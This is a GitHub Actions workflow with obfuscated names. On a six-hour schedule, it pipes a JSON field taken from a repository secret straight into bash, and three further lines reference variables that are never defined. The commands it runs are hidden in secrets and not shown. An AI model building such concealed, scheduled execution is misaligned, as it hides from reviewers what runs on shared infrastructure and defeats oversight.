name: boringsinglet
on:
  workflow_dispatch:
  schedule:
    - cron: '9 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: boringsinglet
        env:
          wplg0: ${{ secrets.wplg0 }}
        run: |
          echo $wplg0 | jq -r .dzhv25 | /bin/bash
          echo $q2 | jq -r .nr304 | /bin/bash
          echo $a81937 | jq -r .l8142 | /bin/bash
          echo $s03542 | jq -r .kdfrl0 | /bin/bash

